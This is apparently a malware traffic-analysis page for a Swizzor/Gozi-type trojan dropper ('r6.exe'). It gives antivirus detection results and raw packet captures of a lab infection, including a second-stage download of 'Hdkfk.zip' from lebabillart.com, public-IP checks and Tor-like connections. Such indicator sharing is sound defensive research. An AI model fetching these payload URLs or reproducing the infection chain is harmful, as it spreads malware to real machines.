Swizzor Malware Trojan Downloader Dropper r6.php?cmd=e PCAP file Download Traffic Analysis Sample

Download Attachments

  • pcap r6
    Date added: July 6, 2017 2:15 am Added by: admin File size: 1 MB Downloads: 52
SHA256: e94e398e06ea23be9866db444773c1ca16edb0e6042e51878442a4991c17cf4b
File name: r6.exe
Detection ratio: 19 / 62
Analysis date: 2017-07-06 02:12:20 UTC ( 0 minutes ago )
AegisLab Mal.Swizzor.Gen!c 20170706
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9997 20170705
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170420
Endgame malicious (high confidence) 20170629
ESET-NOD32 a variant of Win32/Kryptik.FUEK 20170705
Invincea heuristic 20170607
Kaspersky UDS:DangerousObject.Multi.Generic 20170705
McAfee Artemis!081AC2E55C35 20170706
McAfee-GW-Edition BehavesLike.Win32.Dropper.gh 20170705
Qihoo-360 HEUR/QVM10.1.4A81.Malware.Gen 20170706
Rising Trojan.Kryptik!8.8 (cloud:qqKhnl05I8F) 20170706
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Gozi-C 20170705
Symantec ML.Attribute.HighConfidence 20170705
Tencent Win32.Trojan.Swizzor.Dla 20170706
TrendMicro Mal_Swizzor 20170706
TrendMicro-HouseCall Mal_Swizzor 20170706

2017-07-05 16:38:45.795048 IP 192.168.1.102.50327 > 192.168.1.100.55555: Flags [P.], seq 1:438, ack 1, win 2053, length 437
E…V.@….R…f…d…..p…..zP…./..GET /r6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://192.168.1.100:55555/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100:55555
Connection: Keep-Alive

2017-07-05 16:38:45.795076 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], ack 438, win 237, length 0
E..(..@.@……d…f…….z.p.bP….5..
2017-07-05 16:38:45.795363 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], seq 1:5841, ack 438, win 237, length 5840
E…..@.@……d…f…….z.p.bP…….HTTP/1.1 200 OK
Date: Wed, 05 Jul 2017 20:38:45 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Wed, 05 Jul 2017 20:19:12 GMT
ETag: “79000-55397b6a51939″
Accept-Ranges: bytes
Content-Length: 495616
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

2017-07-05 16:40:46.672264 IP 192.168.1.102.50328 > 50.87.37.56.80: Flags [P.], seq 2021661667:2021661880, ack 1680714260, win 256, length 213: HTTP: GET /modules/pm/class/Hdkfk.zip HTTP/1.1
E…W9@….$…f2W%8…Px…d-..P…….GET /modules/pm/class/Hdkfk.zip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: lebabillart.com


A..^.&G….).
….9………    [&…J.Y…………z…W.C `[.k.
…{.#.?..!…”U.).
../………J.z.|.C.U….EL-f?.gyG,.    ….A…4m….m4n..PD……!R+..H……G:-.0..W.h.r.S+D…@v.”……@…..=.R..    .4..X……0….*..-..K…..8w.c6.)k….    w8.=…..vOr.4.Rj..P..Ht,$U.p.E..~1F..vPXW….4..#xy.sD6.h..a…d`JyK4.Qo)=..,.-.x…Y.u.*…./.^..2.?.o…..S……………cX2……..9.GQW..Gg.5..i.{.7.<5.j..V……..+…………
H.f’…w..UBkl.9v.;…..d3m<..WP.-
&..-.p .a..34……0…{.RC13C
2017-07-05 16:41:46.995591 IP 192.168.1.102.50415 > 37.48.122.26.80: Flags [P.], seq 3572951193:3572951377, ack 3206900573, win 256, length 184: HTTP: GET / HTTP/1.1
E…#s@…uL…f%0z….P…..%k]P…….GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: curlmyip.net

2017-07-05 16:40:53.778871 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 1028276613:1028276858, ack 2829810775, win 256, length 245: HTTP
E…I.@……..f…    …P=JA…|WP…l……………….a.n…..ND.~.b.zBz.}…N.”…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.r4qr7kaimymhqpkeohxqwk6ma.com………
………………………    .
… ……………………………….
2017-07-05 16:40:53.929880 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 245:379, ack 1011, win 252, length 134: HTTP
E…I.@….Q…f…    …P=JBz…IP…X…….F…BA………d…..=……:.5..&X..dFU…….d….f.,’.P9…H.qV..}-………..0V.m……..C.E3a}../=.G.t…
.Y..t.3@.?{…..t..

…..f………www.btpv.com………
………………………    .
… ……………………………….
2017-07-05 16:40:59.807137 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 224:358, ack 755, win 253, length 134: HTTP
E…2B@…V….f.S.”…P..b…..P…vx……F…BA.’.i.l…y-.$..,K.C….G.Z4.z…l…w…..dz:…../._.Wny…4.lq]……….0″.`.N.,v…&k%.p.4.a}.*..E.K=.4…….._.m/EN.su
2017-07-05 16:40:59.912870 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 358:432, ack 814, win 253, length 74: HTTP

…..g………www.vsgg3.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272209 IP 192.168.1.102.50344 > 89.166.109.22.9001: Flags [P.], seq 3688677451:3688677696, ack 2907826683, win 256, length 245
E…G.@…*….fY.m…#)…K.Q..P…f<………………..”..p>…..JL.J/.f……-…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.3bf6dju2v7wvcd2tdwc7xuyjz.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272587 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 590545619:590545845, ack 2885913782, win 256, length 226
E..
sp@……..f[y……#3……P…>……………..G….:.]._.x..”.Zb.Nx..i.7.=k..H.

…..h………www.z6trd5.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272960 IP 192.168.1.102.50346 > 79.172.193.32.443: Flags [P.], seq 3271176865:3271177105, ack 393248132, win 256, length 240
E…S.@……..fO.. ……2..p}.P………………..bo.e..p.X…..K?y……!|.K…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.ti5cggc3w6fh6qkggygt.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.273351 IP 192.168.1.102.50347 > 144.76.91.135.9001: Flags [P.], seq 4092234089:4092234329, ack 1379166419, win 256, length 240
E…q.@……..f.L[…#)…iR4h.P………………R..f…..)]#..t…t..1KHIAY.(.(…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.oi44tlwdjouche27j6uk.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.273760 IP 192.168.1.102.50348 > 193.11.114.45.9002: Flags [P.], seq 32464236:32464468, ack 1167986777, win 256, length 232
E…uJ@….V…f..r-..#*..]lE..YP………………*…@..R…/e………2………..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..n………www.jfn2xgmrvbtv.com………
………………………    .
… ……………………………….

2017-07-05 16:41:01.275969 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 3057837041:3057837274, ack 656463986, win 256, length 233
E…ha@……..f[…..#).B..’ .rP…M…………..?…U0F..:#.dw.K<d…f…..l.U….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..o………www.kw3lbndwebwz3.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.276371 IP 192.168.1.102.50355 > 159.203.32.149.443: Flags [P.], seq 3989707829:3989708070, ack 851698541, win 256, length 241
E…..@…hY…f.. ……..52..mP……………….    PI[..iU.b…..x..%.jC.d…I…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..w…”. …www.tb3xh2ild426zjbyax5ml.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.276729 IP 192.168.1.102.50356 > 138.201.247.2.61001: Flags [P.], seq 1140788138:1140788371, ack 498199005, win 256, length 233
E…&,@……..f…….IC…….P…6_………………oE}….9…-……..}.D……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..o………www.vsn57bxc3mb2o.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277127 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1708854068:1708854308, ack 2197240829, win 256, length 240
E…..@….=…fT…..#)e..4..;.P………………….^e*ao..H.-.’-…u(WKu.[.osp…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.6jedagsxg3mrdwiddka7.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277578 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 3813650108:3813650348, ack 2006550589, win 256, length 240
E…..@….=…f. B……O..w..=P……………….l….Mb’..1q..V..Pp.r.Yl.Cv..M…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.ihinmgwvwlruzfro7o44.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277964 IP 192.168.1.102.50333 > 78.46.51.124.443: Flags [P.], seq 3319424194:3319424434, ack 3060906392, win 256, length 240
E…3,@……..fN.3|……d..q..P…)k…………..~.:m….g&0X…igC.{MD.J………H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.evtxd72nmocj47moklbg.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.278632 IP 192.168.1.102.50334 > 83.168.200.204.80: Flags [P.], seq 2944603737:2944603981, ack 689799960, win 256, length 244: HTTP
E….^@……..fS……P…Y)…P…V…………..<.o……=b……..X…..89….    ..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..z…%.#.. www.irygrdulouqccdt2bf27xymd.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279174 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 1410216554:1410216799, ack 244719982, win 258, length 245
E…Hv@….8…f3.2…#)T.2j..!nP…i…………….6y.d…..+;../.en…19WZd…….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.aak45gn42iiiixiph5ekrkj7j.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279566 IP 192.168.1.102.50336 > 78.47.18.110.80: Flags [P.], seq 3503629744:3503629982, ack 1339106153, win 256, length 238: HTTP
E…~8@…X….fN/.n…P..%.O.#iP…0……………g\..$1v.{.n.N..,-..T;.\..)…….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..t………www.6di5z3rikdmc6fzplr.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279935 IP 192.168.1.102.50337 > 94.100.6.27.443: Flags [P.], seq 399576572:399576812, ack 3647675222, win 260, length 240
E…].@…u….f^d………..k.VP………………=.w….@..Y..}N.Mp.z3.qon.rQ.3W…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.642l5nfdken6ng6khuvd.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.280372 IP 192.168.1.102.50338 > 37.235.55.83.443: Flags [P.], seq 1010240698:1010240936, ack 667920148, win 260, length 238
E….)@….l…f%.7S….<7..’…P…5r………………’..=C{….
.E0..M.P….(.-E..H.

…..t………www.2yc2podezduls5a2hc.com………
………………………    .
… ……………………………….

2017-07-05 16:41:01.318500 IP 192.168.1.102.50341 > 62.78.245.129.9001: Flags [P.], seq 2340612092:2340612331, ack 167635855, win 256, length 239
E…b.@……..f>N….#)….    …P…………………(.w.-.e.0#?.x.m…..n….J;.0..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..u… …..www.7gb7wwcxdddw2y72xka.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.318813 IP 192.168.1.102.50342 > 46.41.130.68.443: Flags [P.], seq 2491986743:2491986984, ack 1654762805, win 256, length 241
E….I@…Y….f.).D…….7b..5P….9………….J;..f….x…..Y.y@..5.X
1i..<+O..H.

…..w…”. …www.5deqfvyuplq76nmo5kygv.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.319307 IP 192.168.1.102.50358 > 138.197.133.81.443: Flags [P.], seq 841677261:841677487, ack 4217093403, win 256, length 226
E..
..@…”….f…Q….2*…[..P…<

…..h………www.3qkvdr.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.334877 IP 192.168.1.102.50360 > 212.47.239.163.12001: Flags [P.], seq 3227276382:3227276607, ack 3713232475, win 256, length 225
E..    .9@…f….f./…….\T^.Sn[P…79…………….&.W]…^y@..`x….e…..).S.H..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..g………www.nw6ah.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.349150 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 1969936195:1969936430, ack 66593790, win 256, length 235
E…R.@….2…fY…..#)uj.C..#.P………………VU5..*yH..iah2…./K..0.u…t.`…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..q………www.6rg6elubllem6ie.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.349597 IP 192.168.1.102.50361 > 147.135.210.101.443: Flags [P.], seq 894183362:894183591, ack 38755765, win 256, length 229
E…j.@…g….f…e….5L’..O].P….n……………….IyT………….s.x…g(.2..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..k………www.tzlpgwndi.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.368468 IP 192.168.1.102.50350 > 158.69.92.127.443: Flags [P.], seq 225:359, ack 749, win 253, length 134
E…u@@….6…f.E\…….\B….P….]……F…BA.sv…w.rJ)e……….j.7bc.,p..GV.E…f….e
.7.

…..u… …..www.nuhwpyyd6nfnkq3v5uy.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.374806 IP 192.168.1.102.50359 > 195.16.89.145.938: Flags [P.], seq 1471468849:1471469074, ack 3395312164, win 256, length 225
E..    d6@……..f..Y…..W..1.`Z$P…[……………….b..w..1.X.I..”.o.v….U.w….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..g………www.a7vt5.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.399201 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 233:367, ack 750, win 253, length 134
E…hb@….{…f[…..#).B..’ ._P…xx……F…BA..ck…….f.Z~…..2.RV….s….3kw..?l…W:Iq……….R…..h0……….0)3o…………..O…37.!7..VC…d..1….?…3x.
2017-07-05 16:41:01.404277 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 226:360, ack 1007, win 252, length 134

…..s………www.h3ahgcxy6qbyhzkao.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.806750 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 443:1029, ack 2331, win 256, length 586
E..rR.@……..fY…..#)uj….-.P……….. K[~h.{..1..`……wg.D…..O4.’….. .P.h…n…..z..*.>P.~.Jn.i…o.fK..B..a..{…….%..I..”……”jb..W.%.j…3’f…b…U..’
.!……y@.m.(.5…}…..=.0……B.x….n.o..n..5……a..J&.].q.i[(<..Q..wW……..S<.Kz.t .~..&..4…..Uqp.:.p.49……ZN0j+g.    .t.8!..i….d~…/L=..d.’*.I.T..f.s….j….<..

…..p………www.exzjuqdla2zuht.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.839503 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 1034:1620, ack 2380, win 256, length 586
E..r..@……..f. B……O..w…P…G……. ..1….|…M.fm..M…N”..[..p.e=…. =..R.k.Q……5…9…*{ …#…. v..l.%../f@(nr5*….W|.U……..V2e..Nd…iZ..d…I’}#.%.r….a.
.{Z..X+..R*…S~…qR1..k.e.a…/..KQ.6.v..n.O.~\…,D/&pV…l.`……oq3…..}…..w|…..71v……_f.-.@……%,u1.Pl..W….E…F.Vq…d…yiA>.q.1…7…..a5|..,..6H.\.qQ…….K.]K………o..+.r. ki.>Th.Tr|’a.M’U….p(.GO..&….E..?………#…    O….6……g…$.f.}.{wh.H………<W…n..#.JV.u.!.-<.3.L…..sPo..*.;~.~B..U……-…..=t…5\….~=..j^…….##@.P=(e.e….9..

…..r………www.qj5nowel4s7gpeeh.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.863714 IP 192.168.1.102.50362 > 89.163.128.59.443: Flags [P.], seq 447:1033, ack 2350, win 256, length 586
E..r.4@…Le…fY..;….p8i…..P…:,…… H.q.G4……DR..a..3..M-………… e.T…    F..p…+!.n.a….!..q&rM.Y…LK..(1.f*g@..OPF|…/.8..[.f.NN.D….#Xf    5 E.v;}.<soH..s..Be..c..kQ..n.6. ^n0.X1`..=,k..BFL.S..W…………s……..QS%…….X.7.P.D..i…………@…vv1`….vsf.. .sY.*..L….BT.j.Y.]..Wb.s..a.M…BdI………… .pU”…M…    I…*.S……..7#..v+].X….$…..3…%….._F.pl.p.|u.e<~!.).E.q.&…y..w.m.._.).. ……OR…X..    ,………..i.^………%YFk*8t…J[.5Z….2i.(..c….AKv…g..c……$n..!>…&.\.i!…..uk…..j…Mx..r.M.Hn..LF.=$nR..&-9….pe.~….f&.i.}……….e..!…yo….^2..ZRq. ….s
2017-07-05 16:41:01.869640 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1034:1620, ack 2358, win 256, length 586

…..k………www.qmkzzyzjz.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.068335 IP 192.168.1.102.50367 > 88.198.148.255.443: Flags [P.], seq 3425834539:3425834780, ack 2791446585, win 256, length 241
E…<.@……..fX……..2.+.b.9P…’………………d00uc@./….?j..d…c.].Q…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..w…”. …www.qkeo5fjh7odaex53nrzo7.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.068537 IP 192.168.1.102.50365 > 144.217.87.78.9001: Flags [P.], seq 1617:2203, ack 2967, win 254, length 586
E..r..@…2T…f..WN..#)R]….Q.P….8…… …….X….P…..0..n..e.YO…5…. .E…..M6U.^…..#xf.g.!..pX..O..p..b .S…X=..N….I.ds..m…m………dM.(…h..L….1(*..U.nR…13…M..H…K……>B.=;d….(M.$ ……..v..w-.x….fH.t……F.O.m_k`…/.+…1..TV..”t$.,…..v+\….?.v.UK.-2c..m..y….w).4.fzI…..j|~….8.S.R…g^%…)..L.s…..n.?….<…!..kR..4….9.|A.!.Vs.ABk.~.Z..f.R..p..\…
….%..v)……Z.g’…e..F4..XP+C…..)….I.K.=O=..E…..,..Ox.S……m…X.Q….(C.t.)…!..bN..7…….s….)|..m..V.S,.8.$.0….|..q………6.=#L.s.8mAE..t….D…p0.B……n09.Ib..T;.!.c….Q&..EA…….].ZRg.V..    .9

…..o………www.oshw5kihq7h6m.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302916 IP 192.168.1.102.50369 > 5.39.33.176.9001: Flags [P.], seq 1333368373:1333368606, ack 523297106, win 256, length 233
E…..@……..f.’!…#)Oy.5.0.RP….M………….Ll
…..I3Y…*s…]……I’..X…H.

…..o………www.2ivry2rhlsedt.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302932 IP 192.168.1.102.50377 > 208.80.154.39.9002: Flags [P.], seq 3909397981:3909398212, ack 1235496428, win 256, length 231
E…..@……..f.P.’..#*….I.-.P………………{.]………:..g….I(..A.vV……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..m………www.g34wync2gay.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302936 IP 192.168.1.102.50374 > 88.99.68.246.9001: Flags [P.], seq 2809581064:2809581295, ack 3172681866, win 256, length 231
E…c.@…6….fXcD…#).v….H.P…/……………q.EO….n……./.w……W4……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..m………www.24wsxlew22o.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302941 IP 192.168.1.102.50376 > 212.47.245.76.9001: Flags [P.], seq 3503728016:3503728254, ack 3139782477, win 256, length 238
E… o@…M….f./.L..#)…..%GMP………………o…’S.,R..=d….m!..`z…ot+G….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..t………www.fres4kxhkdbq4zkuon.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302947 IP 192.168.1.102.50370 > 185.73.220.8.443: Flags [P.], seq 2951769582:2951769824, ack 2938571099, win 260, length 242
E…sz@…/….f.I……..m..’    [P…dz………….z
..+.@…-0..f)k.:..2.u.%……..H.

…..x…#.!…www.nlxzuet4sn2w4e4hj4xufw.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302951 IP 192.168.1.102.50373 > 179.43.168.166.443: Flags [P.], seq 1204194106:1204194345, ack 3572972556, win 260, length 239
E…J~@……..f.+……G..:..<.P….}……………….g………O.[…..m..#.{!D..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..u… …..www.sjoqaev4ide4zrf2hap.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302954 IP 192.168.1.102.50371 > 80.238.122.106.9001: Flags [P.], seq 1823198598:1823198825, ack 679601301, win 256, length 227
E…..@…_X…fP.zj..#)l…(…P…3H………….@?..k….EO[Q..^.Ve..|..
.@.M+.A..H.

…..i………www.smqzyif.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302991 IP 192.168.1.102.50375 > 178.62.66.18.9001: Flags [P.], seq 3599510712:3599510955, ack 2206526366, win 256, length 243
E…=.@……..f.>B…#)..,…..P………………F.._.v…j\.L9D.)y…Rl.xM…..9..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..y…$.”…www.uje4qre7zeih6zxcnmpehhq.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302995 IP 192.168.1.102.50372 > 185.14.28.216.22: Flags [P.], seq 420702787:420703027, ack 2486638856, win 256, length 240
E…..@…_”…f……….jC.7..P….u………….,.a..7…,..V..f..^.}N1F..z..”k,..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.aftox7fcxtwy5vfx3m7c.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.303000 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 6967:7553, ack 31517, win 256, length 586
E..rH.@……..f3.2…#)T.M…..P……….. .’G5<x..s..E.z..i+…qz…
..H…… yl..K…cyR…7….r………..Y.3d.af…….F…!    …..n…T..

…..u… …..www.x76fxmp6synvp4olcnf.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.345468 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 12156:12742, ack 42950, win 256, length 586
E..r..@……..fT…..#)e.:…..P……….. ..6…F..N<..tUg……..&6..B……. …v#t.-….Ps.|…….1.F~).sS.N.i..$……….#.|.    =_S….y….\(…-~.p..!^..p.
.    …QAH.4…….`cD a…\…..X..m..|.%y…….l….kWP.&.oQ.Aj7.f…..’uB….d..#.}._?`hOk……..-.W.N..-..%..3..0.=D.k.4…|/.K…Ne*zw..fp.1.qL…..n..R.-..SXh.b..e…    .RV..n…….o..B.B.2Pnp..-.W.0….9.OZ…1…ti..2..S.,..x/…n…..I*O.3.R.

…..k………www.qmkzzyzjz.com………
………………………    .
… ……………………………….

========================= DNS REQUESTS =================================

2017-07-05 16:40:46.246003 IP 192.168.1.102.53471 > 75.75.75.75.53: 3090+ A? lebabillart.com. (33)
E..=…….k…fKKKK…5.)9…………..lebabillart.com…..
2017-07-05 16:41:46.683380 IP 192.168.1.102.53472 > 75.75.75.75.53: 44790+ A? resolver1.opendns.com. (39)
E..C…….d…fKKKK…5./.x…………        resolver1.opendns.com…..
2017-07-05 16:41:46.740625 IP 192.168.1.102.53473 > 75.75.75.75.53: 5628+ A? curlmyip.net. (30)
E..:…….l…fKKKK…5.&……………curlmyip.net…..
2017-07-05 16:41:46.790071 IP 192.168.1.102.53474 > 208.67.222.222.53: 1+ PTR? 222.222.67.208.in-addr.arpa. (45)
E..I………..f.C…..5.5a…………..222.222.67.208.in-addr.arpa…..
2017-07-05 16:41:46.830077 IP 192.168.1.102.53475 > 208.67.222.222.53: 2+ A? myip.opendns.com.localdomain. (46)
E..J………..f.C…..5.6.}………….myip.opendns.com.localdomain…..
2017-07-05 16:41:46.860243 IP 192.168.1.102.53476 > 208.67.222.222.53: 3+ AAAA? myip.opendns.com.localdomain. (46)
E..J………..f.C…..5.6.`………….myip.opendns.com.localdomain…..
2017-07-05 16:41:46.898746 IP 192.168.1.102.53477 > 208.67.222.222.53: 4+ A? myip.opendns.com. (34)
E..>………..f.C…..5.*Q…………..myip.opendns.com…..
2017-07-05 16:41:46.940960 IP 192.168.1.102.53478 > 208.67.222.222.53: 5+ AAAA? myip.opendns.com. (34)
E..>………..f.C…..5.*Q…………..myip.opendns.com…..
2017-07-05 16:41:59.775454 IP 192.168.1.102.65176 > 75.75.75.75.53: 29311+ A? ipcast1.dynupdate.noip.com. (44)
E..H…….]…fKKKK…5.4a.r…………ipcast1        dynupdate.noip.com…..
2017-07-05 16:42:14.298395 IP 192.168.1.102.53348 > 75.75.75.75.53: 54941+ A? client.wns.windows.com. (40)
E..D…….`…fKKKK.d.5.0/B………….client.wns.windows.com…..
2017-07-05 16:42:14.316391 IP 192.168.1.102.53348 > 75.75.76.76.53: 54941+ A? client.wns.windows.com. (40)
E..D……a….fKKLL.d.5.0.A………….client.wns.windows.com…..
2017-07-05 16:42:14.576805 IP 192.168.1.102.61411 > 75.75.75.75.53: 10302+ A? BN4SCH101122406.wns.windows.com. (49)
E..M…….U…fKKKK…5.9.C(>………..BN4SCH101122406.wns.windows.com…..
2017-07-05 16:43:23.899661 IP 192.168.1.102.61412 > 75.75.75.75.53: 54931+ A? dns.msftncsi.com. (34)
E..>…….c…fKKKK…5.*.D………….dns.msftncsi.com…..
2017-07-05 16:43:23.916411 IP 192.168.1.102.61413 > 75.75.75.75.53: 2211+ AAAA? dns.msftncsi.com. (34)
E..>…….b…fKKKK…5.*……………dns.msftncsi.com…..
2017-07-05 16:45:02.659817 IP 192.168.1.102.59548 > 75.75.75.75.53: 8336+ A? evoke-windowsservices-tas.msedge.net. (54)
E..R…….M…fKKKK…5.>.( …………evoke-windowsservices-tas.msedge.net…..

Leave a Reply